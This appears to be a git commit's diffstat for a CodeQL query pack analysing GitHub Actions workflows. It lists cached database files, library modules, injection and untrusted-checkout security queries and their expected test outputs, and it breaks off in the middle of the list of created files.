db/db-yaml/default/cache/pages/c2.pack | Bin 0 -> 97 bytes db/db-yaml/default/cache/pages/d0.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/d0.pack.d | Bin 0 -> 5185 bytes db/db-yaml/default/cache/pages/d5.pack | Bin 0 -> 118 bytes db/db-yaml/default/cache/pages/d6.pack | Bin 0 -> 116 bytes db/db-yaml/default/cache/pages/d6.pack.d | Bin 0 -> 1767 bytes db/db-yaml/default/cache/pages/d7.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/d7.pack.d | Bin 0 -> 427 bytes db/db-yaml/default/cache/pages/df.pack | Bin 0 -> 86 bytes db/db-yaml/default/cache/pages/e1.pack | Bin 0 -> 96 bytes db/db-yaml/default/cache/pages/e9.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/e9.pack.d | Bin 0 -> 101 bytes db/db-yaml/default/cache/pages/f3.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/f3.pack.d | Bin 0 -> 3380 bytes db/db-yaml/default/cache/pages/f6.pack | Bin 0 -> 159 bytes db/db-yaml/default/cache/pages/fc.pack | Bin 0 -> 220 bytes db/db-yaml/default/cache/pages/fc.pack.d | Bin 0 -> 483 bytes db/db-yaml/default/cache/pages/fd.pack | Bin 0 -> 134 bytes db/db-yaml/default/cache/predicates/00.pack | Bin 0 -> 141 bytes db/db-yaml/default/cache/predicates/01.pack | Bin 0 -> 219 bytes db/db-yaml/default/cache/predicates/02.pack | Bin 0 -> 214 bytes db/db-yaml/default/cache/predicates/04.pack | Bin 0 -> 493 bytes db/db-yaml/default/cache/predicates/06.pack | Bin 0 -> 232 bytes db/db-yaml/default/cache/predicates/07.pack | Bin 0 -> 210 bytes db/db-yaml/default/cache/predicates/08.pack | Bin 0 -> 338 bytes db/db-yaml/default/cache/predicates/09.pack | Bin 0 -> 558 bytes db/db-yaml/default/cache/predicates/18.pack | Bin 0 -> 363 bytes db/db-yaml/default/cache/predicates/1b.pack | Bin 0 -> 169 bytes db/db-yaml/default/cache/predicates/1c.pack | Bin 0 -> 144 bytes db/db-yaml/default/cache/predicates/1f.pack | Bin 0 -> 341 bytes db/db-yaml/default/cache/predicates/22.pack | Bin 0 -> 204 bytes db/db-yaml/default/cache/predicates/24.pack | Bin 0 -> 218 bytes 
db/db-yaml/default/cache/predicates/25.pack | Bin 0 -> 169 bytes db/db-yaml/default/cache/predicates/26.pack | Bin 0 -> 146 bytes db/db-yaml/default/cache/predicates/27.pack | Bin 0 -> 170 bytes db/db-yaml/default/cache/predicates/28.pack | Bin 0 -> 223 bytes db/db-yaml/default/cache/predicates/29.pack | Bin 0 -> 216 bytes db/db-yaml/default/cache/predicates/2a.pack | Bin 0 -> 214 bytes db/db-yaml/default/cache/predicates/2d.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/predicates/2e.pack | Bin 0 -> 340 bytes db/db-yaml/default/cache/predicates/2f.pack | Bin 0 -> 152 bytes db/db-yaml/default/cache/predicates/32.pack | Bin 0 -> 409 bytes db/db-yaml/default/cache/predicates/3a.pack | Bin 0 -> 211 bytes db/db-yaml/default/cache/predicates/3c.pack | Bin 0 -> 413 bytes db/db-yaml/default/cache/predicates/42.pack | Bin 0 -> 546 bytes db/db-yaml/default/cache/predicates/48.pack | Bin 0 -> 343 bytes db/db-yaml/default/cache/predicates/49.pack | Bin 0 -> 220 bytes db/db-yaml/default/cache/predicates/4c.pack | Bin 0 -> 151 bytes db/db-yaml/default/cache/predicates/4e.pack | Bin 0 -> 144 bytes db/db-yaml/default/cache/predicates/55.pack | Bin 0 -> 145 bytes db/db-yaml/default/cache/predicates/57.pack | Bin 0 -> 210 bytes db/db-yaml/default/cache/predicates/58.pack | Bin 0 -> 211 bytes db/db-yaml/default/cache/predicates/59.pack | Bin 0 -> 206 bytes db/db-yaml/default/cache/predicates/5a.pack | Bin 0 -> 655 bytes db/db-yaml/default/cache/predicates/5f.pack | Bin 0 -> 212 bytes db/db-yaml/default/cache/predicates/60.pack | Bin 0 -> 151 bytes db/db-yaml/default/cache/predicates/62.pack | Bin 0 -> 419 bytes db/db-yaml/default/cache/predicates/65.pack | Bin 0 -> 357 bytes db/db-yaml/default/cache/predicates/68.pack | Bin 0 -> 210 bytes db/db-yaml/default/cache/predicates/69.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/6c.pack | Bin 0 -> 206 bytes db/db-yaml/default/cache/predicates/6f.pack | Bin 0 -> 169 bytes db/db-yaml/default/cache/predicates/72.pack | Bin 
0 -> 219 bytes db/db-yaml/default/cache/predicates/73.pack | Bin 0 -> 299 bytes db/db-yaml/default/cache/predicates/74.pack | Bin 0 -> 204 bytes db/db-yaml/default/cache/predicates/75.pack | Bin 0 -> 345 bytes db/db-yaml/default/cache/predicates/77.pack | Bin 0 -> 207 bytes db/db-yaml/default/cache/predicates/7a.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/7b.pack | Bin 0 -> 207 bytes db/db-yaml/default/cache/predicates/7c.pack | Bin 0 -> 141 bytes db/db-yaml/default/cache/predicates/7d.pack | Bin 0 -> 161 bytes db/db-yaml/default/cache/predicates/7e.pack | Bin 0 -> 220 bytes db/db-yaml/default/cache/predicates/82.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/86.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/87.pack | Bin 0 -> 206 bytes db/db-yaml/default/cache/predicates/88.pack | Bin 0 -> 291 bytes db/db-yaml/default/cache/predicates/89.pack | Bin 0 -> 144 bytes db/db-yaml/default/cache/predicates/8d.pack | Bin 0 -> 231 bytes db/db-yaml/default/cache/predicates/8f.pack | Bin 0 -> 212 bytes db/db-yaml/default/cache/predicates/91.pack | Bin 0 -> 244 bytes db/db-yaml/default/cache/predicates/95.pack | Bin 0 -> 415 bytes db/db-yaml/default/cache/predicates/97.pack | Bin 0 -> 154 bytes db/db-yaml/default/cache/predicates/98.pack | Bin 0 -> 414 bytes db/db-yaml/default/cache/predicates/99.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/9c.pack | Bin 0 -> 170 bytes db/db-yaml/default/cache/predicates/9d.pack | Bin 0 -> 170 bytes db/db-yaml/default/cache/predicates/9e.pack | Bin 0 -> 220 bytes db/db-yaml/default/cache/predicates/a0.pack | Bin 0 -> 468 bytes db/db-yaml/default/cache/predicates/a2.pack | Bin 0 -> 204 bytes db/db-yaml/default/cache/predicates/a4.pack | Bin 0 -> 140 bytes db/db-yaml/default/cache/predicates/a8.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/a9.pack | Bin 0 -> 140 bytes db/db-yaml/default/cache/predicates/aa.pack | Bin 0 -> 161 bytes 
db/db-yaml/default/cache/predicates/ad.pack | Bin 0 -> 206 bytes db/db-yaml/default/cache/predicates/ae.pack | Bin 0 -> 154 bytes db/db-yaml/default/cache/predicates/b0.pack | Bin 0 -> 568 bytes db/db-yaml/default/cache/predicates/b2.pack | Bin 0 -> 211 bytes db/db-yaml/default/cache/predicates/b5.pack | Bin 0 -> 412 bytes db/db-yaml/default/cache/predicates/b8.pack | Bin 0 -> 161 bytes db/db-yaml/default/cache/predicates/bd.pack | Bin 0 -> 250 bytes db/db-yaml/default/cache/predicates/c1.pack | Bin 0 -> 217 bytes db/db-yaml/default/cache/predicates/c4.pack | Bin 0 -> 412 bytes db/db-yaml/default/cache/predicates/ca.pack | Bin 0 -> 254 bytes db/db-yaml/default/cache/predicates/cb.pack | Bin 0 -> 170 bytes db/db-yaml/default/cache/predicates/cc.pack | Bin 0 -> 146 bytes db/db-yaml/default/cache/predicates/cd.pack | Bin 0 -> 352 bytes db/db-yaml/default/cache/predicates/d2.pack | Bin 0 -> 363 bytes db/db-yaml/default/cache/predicates/d5.pack | Bin 0 -> 260 bytes db/db-yaml/default/cache/predicates/d8.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/dc.pack | Bin 0 -> 212 bytes db/db-yaml/default/cache/predicates/de.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/df.pack | Bin 0 -> 499 bytes db/db-yaml/default/cache/predicates/e0.pack | Bin 0 -> 151 bytes db/db-yaml/default/cache/predicates/e3.pack | Bin 0 -> 353 bytes db/db-yaml/default/cache/predicates/e4.pack | Bin 0 -> 344 bytes db/db-yaml/default/cache/predicates/e6.pack | Bin 0 -> 212 bytes db/db-yaml/default/cache/predicates/ec.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/ed.pack | Bin 0 -> 223 bytes db/db-yaml/default/cache/predicates/ee.pack | Bin 0 -> 244 bytes db/db-yaml/default/cache/predicates/f0.pack | Bin 0 -> 276 bytes db/db-yaml/default/cache/predicates/f2.pack | Bin 0 -> 411 bytes db/db-yaml/default/cache/predicates/f3.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/f6.pack | Bin 0 -> 491 bytes db/db-yaml/default/cache/predicates/f7.pack | Bin 
0 -> 217 bytes db/db-yaml/default/cache/predicates/fa.pack | Bin 0 -> 207 bytes db/db-yaml/default/cache/predicates/fb.pack | Bin 0 -> 215 bytes db/db-yaml/default/cache/predicates/fc.pack | Bin 0 -> 263 bytes db/db-yaml/default/cache/predicates/ff.pack | Bin 0 -> 253 bytes db/db-yaml/default/cache/relations/07.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/0a.pack | Bin 0 -> 177 bytes db/db-yaml/default/cache/relations/0c.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/0d.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/12.pack | Bin 0 -> 177 bytes db/db-yaml/default/cache/relations/13.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/14.pack | Bin 0 -> 255 bytes db/db-yaml/default/cache/relations/19.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/1d.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/1e.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/22.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/2b.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/relations/32.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/35.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/52.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/5a.pack | Bin 0 -> 177 bytes db/db-yaml/default/cache/relations/60.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/65.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/6e.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/relations/71.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/73.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/76.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/78.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/81.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/86.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/8a.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/92.pack | Bin 0 -> 126 
bytes db/db-yaml/default/cache/relations/9a.pack | Bin 0 -> 272 bytes db/db-yaml/default/cache/relations/9d.pack | Bin 0 -> 340 bytes db/db-yaml/default/cache/relations/a9.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/aa.pack | Bin 0 -> 272 bytes db/db-yaml/default/cache/relations/ac.pack | Bin 0 -> 109 bytes db/db-yaml/default/cache/relations/b3.pack | Bin 0 -> 272 bytes db/db-yaml/default/cache/relations/b4.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/relations/b6.pack | Bin 0 -> 177 bytes db/db-yaml/default/cache/relations/b8.pack | Bin 0 -> 435 bytes db/db-yaml/default/cache/relations/bf.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/c4.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/c7.pack | Bin 0 -> 272 bytes db/db-yaml/default/cache/relations/ca.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/cd.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/d1.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/d6.pack | Bin 0 -> 255 bytes db/db-yaml/default/cache/relations/dc.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/e3.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/ee.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/relations/f1.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/f7.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/f9.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/fd.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/version | 1 + db/db-yaml/default/containerparent.rel | Bin 0 -> 328 bytes .../default/containerparent.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/files.rel | Bin 0 -> 208 bytes db/db-yaml/default/files.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/folders.rel | Bin 0 -> 128 bytes db/db-yaml/default/folders.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/locations_default.rel | Bin 0 -> 33384 bytes .../default/locations_default.rel.checksum | Bin 0 -> 12 bytes 
db/db-yaml/default/pools/0/buckets/info | Bin 0 -> 40 bytes .../default/pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes db/db-yaml/default/pools/0/info | Bin 0 -> 33 bytes db/db-yaml/default/pools/0/metadata/info | Bin 0 -> 40 bytes .../default/pools/0/metadata/page-000000 | Bin 0 -> 16384 bytes .../default/pools/0/pageDump/page-000000000 | 55 +++ db/db-yaml/default/pools/1/buckets/info | Bin 0 -> 40 bytes .../default/pools/1/buckets/page-000000 | Bin 0 -> 8192 bytes db/db-yaml/default/pools/1/ids1/info | Bin 0 -> 40 bytes db/db-yaml/default/pools/1/ids1/page-000000 | Bin 0 -> 8192 bytes db/db-yaml/default/pools/1/indices1/info | Bin 0 -> 40 bytes .../default/pools/1/indices1/page-000000 | Bin 0 -> 8192 bytes db/db-yaml/default/pools/1/info | Bin 0 -> 41 bytes db/db-yaml/default/pools/1/metadata/info | Bin 0 -> 40 bytes .../default/pools/1/metadata/page-000000 | Bin 0 -> 8192 bytes .../default/pools/1/pageDump/page-000000000 | Bin 0 -> 1048592 bytes db/db-yaml/default/pools/poolInfo | Bin 0 -> 32 bytes db/db-yaml/default/sourceLocationPrefix.rel | Bin 0 -> 4 bytes .../default/sourceLocationPrefix.rel.checksum | Bin 0 -> 12 bytes .../default/strings/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../default/strings/0/metadata/page-000000 | Bin 0 -> 16384 bytes .../default/strings/0/pageDump/page-000000000 | 2 + db/db-yaml/default/yaml.rel | Bin 0 -> 33384 bytes db/db-yaml/default/yaml.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/yaml_locations.rel | Bin 0 -> 11128 bytes .../default/yaml_locations.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/yaml_scalars.rel | Bin 0 -> 12540 bytes db/db-yaml/default/yaml_scalars.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/yaml.dbscheme | 80 ++++ ...-diagnostics-add-20240301T120559.348Z.json | 0 ...-diagnostics-add-20240301T120600.004Z.json | 0 .../database-create-20240301.130558.279.log | 321 ++++++++++++++ ...tabase-index-files-20240301.130558.974.log | 44 ++ db/src.zip | Bin 0 -> 20479 bytes 
ql/lib/codeql/actions/Ast.qll | 391 +++++++++++------ .../codeql/actions/ast/internal/Actions.qll | 398 ------------------ .../actions/controlflow/internal/Cfg.qll | 26 +- .../codeql/actions/dataflow/ExternalFlow.qll | 10 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 4 +- .../dataflow/internal/DataFlowPrivate.qll | 4 +- .../dataflow/internal/DataFlowPublic.qll | 4 +- .../codeql-database.yml | 39 -- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/CompositeActionsSources.ql | 2 +- .../CWE-020/CompositeActionsSummaries.ql | 2 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSources.ql | 2 +- .../CWE-020/ReusableWorkflowsSummaries.ql | 2 +- .../CWE-094/CriticalExpressionInjection.ql | 2 +- .../Security/CWE-094/ExpressionInjection.ql | 2 +- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- ql/src/Security/CWE-829/UntrustedCheckout.ql | 4 +- ql/test/library-tests/test.expected | 249 ++++++----- ql/test/library-tests/test.ql | 16 +- .../CWE-020/CompositeActionsSinks.expected | 6 +- .../CWE-020/CompositeActionsSources.expected | 12 +- .../CompositeActionsSummaries.expected | 6 +- .../CWE-020/ReusableWorkflowsSources.expected | 12 +- .../ReusableWorkflowsSummaries.expected | 12 +- .../CriticalExpressionInjection.expected | 104 ++--- .../CWE-094/ExpressionInjection.expected | 110 ++--- .../MissingActionsPermissions.expected | 2 +- .../CWE-829/UnpinnedActionsTag.expected | 14 +- .../CWE-829/UntrustedCheckout.expected | 2 +- 408 files changed, 1091 insertions(+), 868 deletions(-) create mode 100755 clean.sh create mode 100644 db/baseline-info.json create mode 100644 db/codeql-database.yml create mode 100644 db/db-yaml/default/cache/.lock create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/buckets/info create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/ids1/info create mode 100644 
db/db-yaml/default/cache/cached-strings/pools/0/ids1/page-000000 create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/indices1/info create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/indices1/page-000000 create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/info create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/metadata/info create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 create mode 100644 db/db-yaml/default/cache/cached-strings/pools/poolInfo create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/header create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#0#e create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#1#eb create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#2#e create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7#0# 
create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#1#b create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#2# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-0defa4a0 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-0defa4a0#0#tttttt create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-0defa4a0#1#tt create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-5b92615f create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-5b92615f#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-5b92615f#1#ttt create mode 100644 
db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-6e089ab6 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-6e089ab6#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-a2a08e4a create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-a2a08e4a#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-a2a08e4a#1#tt create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-b0571e78 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-b0571e78#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-b0571e78#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-b18fe878 create mode 100644 
db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-b18fe878#0#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFront-12309985 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFront-12309985#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFront-12309985#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857#0# create mode 100644 
db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-baba9c49 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-baba9c49#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-baba9c49#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22#1#b create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5#0# create mode 100644 
db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5#2# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TLocalFlowCallCont-17f4a8f6 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TLocalFlowCallCont-17f4a8f6#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TParamNodeOption-178d6b8b create mode 100644 